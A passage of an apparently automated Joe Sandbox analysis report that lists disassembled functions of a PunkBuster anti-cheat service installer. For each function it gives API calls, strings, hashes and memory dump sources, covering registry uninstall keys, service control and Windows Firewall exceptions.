                                              • Instruction Fuzzy Hash: FA218C71A4020AEFDB11CF95CD41B99BBB4BF58304F20406AEA50BB2A5DBB5E940CB18
                                              Function 00408636 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57timestringencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmp.KERNEL32(1.2.840.113549.1.9.5,?), ref: 0040865E
                                              • CryptDecodeObject.CRYPT32(00010001,1.2.840.113549.1.9.5,?,00000008,00000000,?,00000008), ref: 0040869A
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004086AC
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004086B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$File$CryptDecodeLocalObjectSystemlstrcmp
                                              • String ID: 1.2.840.113549.1.9.5
                                              • API String ID: 1508694121-925610549
                                              • Opcode ID: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction ID: f212b015d127512b5763636b9bb1128a0e4d06747a3459900feecbf1282a5b97
                                              • Opcode Fuzzy Hash: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction Fuzzy Hash: 52118E71900208EFCB00CF84C984AEEBBB8FF58340F10446AE946A7660DB71E985CB54
                                              Function 0040631D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406322
                                              • CoCreateInstance.OLE32(004E8254,00000000,00000001,004E8264,?), ref: 0040634B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateH_prologInstance
                                              • String ID: Message$get_LocalPolicy failed: 0x%08lx
                                              • API String ID: 457505298-1432678775
                                              • Opcode ID: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction ID: 249664490226cffe886a95c969e3a1f1bb7c66dd1e282c0fdea98710dae82b57
                                              • Opcode Fuzzy Hash: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction Fuzzy Hash: F231C270900259AFCB00DF95C8C5EAEB7B8AF44314F10456EF916E72D1C7749E45CBA5
                                              Function 0040906B Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
                                              • CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
                                              • FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 0084a8df59852fb23f4d842f0e280472506688cdee7ca5d4ae6dbb38f93792d0
                                              • Instruction ID: 0093eee121a347d177201e0670dc03f8a1d7b9820f7e5e488a3c2593e256f184
                                              • Opcode Fuzzy Hash: 0084a8df59852fb23f4d842f0e280472506688cdee7ca5d4ae6dbb38f93792d0
                                              • Instruction Fuzzy Hash: F7017171944288EFDB00DBE4CC84AEEBB78FB14204F4444AAE101B3292D7705A44CB29
                                              Function 004BF370 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction ID: bdc00cd6b65ee0f6ee7ee328d437f288e7a79eff7ae3f2207484cd450b30d8cb
                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction Fuzzy Hash: C0117D7720015243D6048A3DDCB45FBE7D5EBD532072C637BD84A8B748D22ED95E9628
                                              Function 004073EA Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 222registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004073EF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00407463
                                                • Part of subcall function 004BC79F: __lock.LIBCMT ref: 004BC7BD
                                                • Part of subcall function 004BC79F: HeapFree.KERNEL32(00000000,?,0050EE00,0000000C,004C280D,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004BC804
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 00407555
                                              • RegCreateKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,?), ref: 00407568
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 0040757D
                                              • _strlen.LIBCMT ref: 004075A3
                                              • RegSetValueExA.ADVAPI32(?,UninstallString,00000000,00000002,?,00000001), ref: 004075C8
                                              • _strlen.LIBCMT ref: 004075D0
                                              • RegSetValueExA.ADVAPI32(?,DisplayName,00000000,00000002,PunkBuster Services,00000001), ref: 004075E7
                                              • _strlen.LIBCMT ref: 0040760D
                                              • RegSetValueExA.ADVAPI32(?,DisplayVersion,00000000,00000002,?,00000001), ref: 0040762C
                                              • _strlen.LIBCMT ref: 00407634
                                              • RegSetValueExA.ADVAPI32(?,HelpLink,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 0040764B
                                              • _strlen.LIBCMT ref: 0040764E
                                              • RegSetValueExA.ADVAPI32(?,URLInfoAbout,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 00407665
                                              • _strlen.LIBCMT ref: 0040766D
                                              • RegSetValueExA.ADVAPI32(?,Publisher,00000000,00000002,Even Balance, Inc.,00000001), ref: 00407684
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Value_strlen$Open$CreateDirectoryFreeH_prologHeapSystem__lock
                                              • String ID: -u$%d.%d$DisplayName$DisplayVersion$Even Balance, Inc.$HelpLink$Publisher$PunkBuster Services$Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\$URLInfoAbout$UninstallString$http://www.evenbalance.com/index.php?page=pbsvcfaq.php
                                              • API String ID: 1366487629-2471671963
                                              • Opcode ID: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction ID: 3b5f2e55fd99b0cb6fb53e510ead61fc6bd0a11c4e949306d876edae8efe3064
                                              • Opcode Fuzzy Hash: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction Fuzzy Hash: 9071A27194015CBADB21AB618C82EEE77BCEF44704F1080BBB545B6192CE785E818FE8
                                              Function 0040A208 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 306serviceCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040A20D
                                                • Part of subcall function 0040A0F2: __EH_prolog.LIBCMT ref: 0040A0F7
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000), ref: 0040A347
                                                • Part of subcall function 0040953E: __EH_prolog.LIBCMT ref: 00409543
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF,?,00000000), ref: 0040A47A
                                              • CloseServiceHandle.ADVAPI32(?,?,00000000), ref: 0040A4AD
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000), ref: 0040A4B6
                                              Strings
                                              • This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue., xrefs: 0040A4E3
                                              • Install/Re-Install PunkBuster Service, xrefs: 0040A258
                                              • radioBox, xrefs: 0040A291
                                              • button, xrefs: 0040A3D8
                                              • Message, xrefs: 0040A361
                                              • Un-Install/Remove PunkBuster Service, xrefs: 0040A269
                                              • staticText, xrefs: 0040A4D2
                                              • PnkBstrA, xrefs: 0040A472
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040A36E
                                              • , xrefs: 0040A52A
                                              • &Test Services, xrefs: 0040A3E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologService$CloseHandleOpen$Manager
                                              • String ID: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.$ $ **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$&Test Services$Install/Re-Install PunkBuster Service$Message$PnkBstrA$Un-Install/Remove PunkBuster Service$button$radioBox$staticText
                                              • API String ID: 81804430-3789358379
                                              • Opcode ID: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction ID: 9234b14ef658502d59a1c728953b6f4821128c5ba5519474f5c4182507258a31
                                              • Opcode Fuzzy Hash: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction Fuzzy Hash: 48C18D70900349AEDB10EFA5CC46BEFBBB4AF04308F50456EF555B62D2CBB85A44CB69
                                              Function 00406661 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 298COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406666
                                                • Part of subcall function 0040649F: __EH_prolog.LIBCMT ref: 004064A4
                                                • Part of subcall function 0040649F: SysFreeString.OLEAUT32(?), ref: 00406630
                                              • SysFreeString.OLEAUT32(?), ref: 004069DD
                                              • SysFreeString.OLEAUT32(?), ref: 004069E2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$H_prolog
                                              • String ID: Add failed: 0x%08lx$CoCreateInstance failed: 0x%08lx$Message$SysAllocString failed: 0x%08lx$WindowsFirewallAppIsEnabled failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$put_Name failed: 0x%08lx$put_ProcessImageFileName failed: 0x%08lx
                                              • API String ID: 1529728701-3210245531
                                              • Opcode ID: e017854d60634fd897c017ee63a1a635657d21458fa4df3517fe17c0784f15a3
                                              • Instruction ID: ec26c372339b50ef718af20037966b0fc6ad395da82280a397e0c79cd1b3e807
                                              • Opcode Fuzzy Hash: e017854d60634fd897c017ee63a1a635657d21458fa4df3517fe17c0784f15a3
                                              • Instruction Fuzzy Hash: 6FB1D3B0904158EEDB00EB95CC85FEEBBB9AF08318F65026EF156B32D1D6B85E04C765
                                              Function 00439B20 Relevance: 21.2, APIs: 14, Instructions: 211windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 576 439b20-439b43 577 439b45-439b48 576->577 578 439b4a-439b5c 576->578 577->578 579 439b5d-439b63 577->579 580 439bf3-439bfd 579->580 581 439b69-439ba1 73A16180 579->581 584 439bff-439c15 call 4bb98c 580->584 585 439c3c-439c5f 580->585 582 439bb3-439bbc 581->582 583 439ba3-439baf 581->583 588 439bc4-439bc7 582->588 589 439bbe-439bc2 582->589 583->582 595 439c17-439c2a call 411160 call 439ac0 584->595 596 439c2c 584->596 586 439c71-439c88 call 4387d0 585->586 587 439c61-439c6d 585->587 598 439c90-439c93 586->598 599 439c8a-439c8e 586->599 587->586 592 439bcb-439bf2 CreateIconIndirect DeleteObject 588->592 589->592 597 439c2e-439c3a 595->597 596->597 597->585 601 439c97-439cca 73A14C40 * 2 SelectObject * 2 598->601 599->601 603 439cd0 601->603 604 439ccc-439cce 601->604 606 439cd3-439cd5 603->606 604->606 608 439cd7 606->608 609 439cda-439cf3 73A14D40 606->609 608->609 610 439cf5-439cfb SelectObject 609->610 611 439cfd-439cff 609->611 610->611 612 439d01-439d07 SelectObject 611->612 613 439d09-439d28 DeleteDC * 2 CreateIconIndirect 611->613 612->613 614 439d2a-439d2f 613->614 615 439d3c-439d42 613->615 616 439d31-439d33 614->616 617 439d47-439d65 DeleteObject 614->617 615->617 616->615 618 439d35-439d3a 616->618 618->615 618->617
                                              APIs
                                              • 73A16180.GDI32(?,?,00000001,00000001,00000000,?,?,?), ref: 00439B76
                                              • CreateIconIndirect.USER32(?), ref: 00439BD0
                                              • DeleteObject.GDI32(00000000), ref: 00439BD9
                                              • 73A14C40.GDI32(00000000,?,?,?), ref: 00439C9E
                                              • 73A14C40.GDI32(00000000,?,?,?), ref: 00439CA4
                                              • SelectObject.GDI32(00000000,?), ref: 00439CB3
                                              • SelectObject.GDI32(00000000,?), ref: 00439CBF
                                              • 73A14D40.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,008800C6,?,?,?), ref: 00439CEB
                                              • SelectObject.GDI32(00000000,?), ref: 00439CFB
                                              • SelectObject.GDI32(00000000,?), ref: 00439D07
                                              • DeleteDC.GDI32(00000000), ref: 00439D10
                                              • DeleteDC.GDI32(00000000), ref: 00439D13
                                              • CreateIconIndirect.USER32(?), ref: 00439D1A
                                              • DeleteObject.GDI32(?), ref: 00439D4C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
